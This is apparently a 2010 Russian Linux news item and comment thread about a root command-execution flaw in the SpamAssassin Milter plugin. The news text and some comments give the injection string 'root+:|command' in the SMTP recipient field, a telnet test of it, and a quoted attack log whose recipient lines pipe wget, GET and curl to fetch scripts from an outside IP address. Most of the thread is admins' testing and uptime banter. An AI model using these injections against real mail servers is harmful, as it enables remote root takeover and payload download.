Критическая уязвимость в SpamAssassin Milter Plugin

0

0

Уязвимость позволяет выпонить любой код на сервере с root. Для этого достаточно отравить письмо в поле "rcpt to" находится строка "root+:|команда"). Например - "root+:poweroff". Проблема касается абсолютно всех MTA поддерживающих milter.

>>> Подробности

←	Конференция Sun Tech Days 2010 стартует 8-9 апреля в Питере

fidoip 1.0.5_2 — обновление комплекта программ для работы в сети ФИДО

→

НАУЧИ КОМПЬЮТЕР ВАРИТЬ КОФЕ

управление электрическими цепями с помощью компьютера
лучший подарок для техногика; только открытые программы
http://www.unicontrollers.com/products/unc01x

← 1 2 3 →

[#]

не работает sendmail[6982]: o2L9p2E3006900: to=/dev/null, ctladdr=root:+/sbin/reboot (8/0), delay=00:00:07, xdelay=00:00:00, mailer=*file*, pri=30310, dsn=2.0.0, stat=Sent

anonymous (21.03.2010 13:17:45)

[#] Ответ на: комментарий от anonymous 21.03.2010 13:17:45

разумеется неработает..

Саныч постарался.. :-)

mkfifo

(21.03.2010 16:20:34)

[#]

Ну я так понимаю, прежде всего МТА должен исполняться с правами root, чтобы код от рута исполнить?

Далее, EXIM:

root@mail:~# cat /root/test3
#!/bin/bash
echo 1 > /root/mailtest
root@mail:~# telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220-Welcome on our mail server!
220-This system does not accept Unsolicited Commercial Email
220-and will blacklist offenders via our spam processor.
220-Have a nice day!
220-
220 domain.ru ESMTP
helo domain.ru
250 domain.ru Hello localhost [127.0.0.1]
mail from: root@domain.ru
250 OK
rcpt to: root+:|/root/test3
501 root+:|/root/test3: missing or malformed local part (expected word or "<")
^]
telnet> quit
Connection closed.
root@mail:~# cat /root/mailtest
cat: /root/mailtest: No such file or directory
root@mail:~#

(21.03.2010 16:38:32)

[#] Ответ на: комментарий от r0mik 19.03.2010 22:03:42

> да настройте уже нормально свои MTA!

Тут прозвучала правильная идея - изучить, как работает milter. каллбэки вызываются не после, а во время отработки. Я только сейчас не помню, до соответствующей стадии, или после. Может быть до.

(21.03.2010 19:44:18)

[#] Ответ на: комментарий от ZigmunD 20.03.2010 21:59:23

> exim 4.69-28.1
> spamassassin 3.2.4-29.1

Где здесь spamassassin milter plugin ? :-)

(21.03.2010 19:48:22)

[#]

Я думаю только ленивые не настроили правильно. Но в этом случае так им и надо.

pepsinaft (21.03.2010 19:49:27)

[#] Ответ на: комментарий от AS 21.03.2010 19:44:18

> Я только сейчас не помню, до соответствующей стадии, или после. Может быть до.

В смысле, до или после правил MTA на соответствующей стадии. Если до, все эти "настрой МТА правильно" не прокатят.

(21.03.2010 19:51:37)

[#]

Время пиарить http://puszcza.gnu.org.ua/software/mailfromd/
:-)

(21.03.2010 19:52:24)

[#] Ответ на: комментарий от unixnik 20.03.2010 0:45:01

>uptime 2 дня 19 часов. + мультимедиа что лин не осилит

О, пошло мерянье [s]пись[/s] аптаймом.

Вантуз осилит аптайм 402 дня 19 часов (and counting) + сервер много-чего + рутер + периодическая компиляция (ибо Gentoo) ?

anonymous (21.03.2010 23:57:51)

[#] Ответ на: комментарий от anonymous 21.03.2010 23:57:51

root@mail:~# cat /etc/slackware-version
Slackware 11.0.0
root@mail:~# uptime
12:03:43 up 411 days, 19:00, 1 user, load average: 0.02, 0.06, 0.09
root@mail:~#

Учитесь, сэр!

(22.03.2010 12:04:07)

[#] Ответ на: комментарий от su 22.03.2010 12:04:07

# cat /etc/slackware-version
7.1.0
# uptime
Unknown HZ value! (0) Assume 100.
12:38pm up 531 days, 3:15, 2 users, load average: 0.00, 0.00, 0.00
#

~~bolmer~~ (22.03.2010 14:28:32)

[#] Ответ на: комментарий от bolmer 22.03.2010 14:28:32

12:03:43 up 411 days, 19:00, 1 user, ***load average: 0.02, 0.06, 0.09***
12:38pm up 531 days, 3:15, 2 users, ***load average: 0.00, 0.00, 0.00***

Засуньте свои аптаймописькомерки с таким LA обратно в свои кладовки и ещё пару лет про них не вспоминайте

Lumi

(22.03.2010 15:42:20)

[#] Ответ на: комментарий от WARNING 19.03.2010 21:45:18

SMTP protocol synchronization error (next input sent too soon: pipelining was not advertised): rejected "rcpt to: root+:"|wget http://61.100.185.177/busy-1.php"" H=(bluedick) [68.236.170.186] I=[my-ip]:25 next input="rcpt to: root+:"|GET http://61.100.185.177/busy-2.php"\r\nrcpt to: root+:"|curl http://61.100.185.177/busy-3.php"\r\ndata\r\n.\r\nquit\r\n"

правда спамасасина нету

anonymous (22.03.2010 15:45:39)

[#] Ответ на: комментарий от Lumi 22.03.2010 15:42:20

Ну это вы зря. :) Поскольку серверок почтовый, у него очень хорошо плавает LA.

Самое высокое - по утрам, когда все юзверята одновременно приходят и начинают качать накопленную за ночь эту нашу почту. Там ЛА доходит до 20.

Вообще, серверок обрабатывает в среднем где-то 150-200 писем в минуту (то есть, 2-4 письма в секунду).

(22.03.2010 16:19:28)

[#] Ответ на: комментарий от Lumi 22.03.2010 15:42:20

> Засуньте свои аптаймописькомерки с таким LA обратно в свои
> кладовки и ещё пару лет про них не вспоминайте

А вот не надо допускать большой LA. ;-) Максимум - это количество ядер. Если регулярно превышает - это сигнал к апгрейду.

(22.03.2010 17:01:45)

[#] Ответ на: комментарий от su 22.03.2010 12:04:07

> 12:03:43 up 411 days, 19:00, 1 user, load average: 0.02, 0.06, 0.09
root@mail:~#

> Учитесь, сэр!

Да ладно...
18:02:52 up 452 days, 2:29, 4 users, load average: 0.19, 0.23, 0.19

;-)

(22.03.2010 17:03:36)

[#] Ответ на: комментарий от AS 22.03.2010 17:01:45

> Максимум - это количество ядер.
Спасибо, капитан, я в курсе
> ***load average: 0.00, 0.00, 0.00***
Сколько здесь ядер?

Lumi

(23.03.2010 12:02:18)

[#] Ответ на: комментарий от Lumi 23.03.2010 12:02:18

Можно съэкономить выключив этот сервер!

catap

(24.03.2010 15:01:23)

← 1 2 3 →

←	Конференция Sun Tech Days 2010 стартует 8-9 апреля в Питере

Безопасность

fidoip 1.0.5_2 — обновление комплекта программ для работы в сети ФИДО

→